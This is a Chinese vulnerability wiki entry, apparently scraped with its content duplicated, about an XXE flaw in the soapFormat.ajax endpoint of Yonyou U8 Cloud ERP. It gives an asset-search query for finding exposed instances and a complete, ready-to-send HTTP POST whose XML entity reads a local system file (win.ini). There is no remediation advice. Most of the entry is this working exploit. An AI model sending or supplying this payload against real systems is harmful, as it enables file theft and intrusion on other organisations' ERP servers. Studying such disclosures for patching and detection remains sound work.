fofamini-wiki

登录白背景

源码

用友U8 Cloud soapFormat 存在xxe漏洞

一、漏洞简介

用友U8 Cloud是用友公司推出的企业上云数字化平台，为成长型和创新型企业提供全面的云ERP解决方案。用友U8 Cloud soapFormat 存在xxe漏洞

二、影响版本

用友U8 Cloud

三、资产测绘

hunterapp.name="用友 U8 Cloud"

登录页面

四、漏洞复现

POST /uapws/soapFormat.ajax HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection: close
Host: {hostname}
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 259

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

原文: https://www.yuque.com/xiaokp7/ocvun2/gltnv6egohwguuge

# 用友U8 Cloud soapFormat 存在xxe漏洞

# 一、漏洞简介
  用友U8 Cloud是用友公司推出的企业上云数字化平台，为成长型和创新型企业提供全面的云ERP解决方案。用友U8 Cloud soapFormat 存在xxe漏洞

# 二、影响版本

- 用友U8 Cloud

# 三、资产测绘

- hunter`app.name="用友 U8 Cloud"`

![image.png](./img/yPOQgrqBIDdKSVVj/1692444362525-121bbed1-c72d-4cad-99db-3e18509417c1-519178.png)

- 登录页面

![image.png](./img/yPOQgrqBIDdKSVVj/1692444381978-7d4ed5bf-a153-47e5-88e6-4dd97953e976-522713.png)

# 四、漏洞复现
```
POST /uapws/soapFormat.ajax HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection: close
Host: {hostname}
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 259

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
```
![image.png](./img/yPOQgrqBIDdKSVVj/1703604776591-468379c3-f5bb-4a75-bae2-41d891c26c8b-847117.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gltnv6egohwguuge>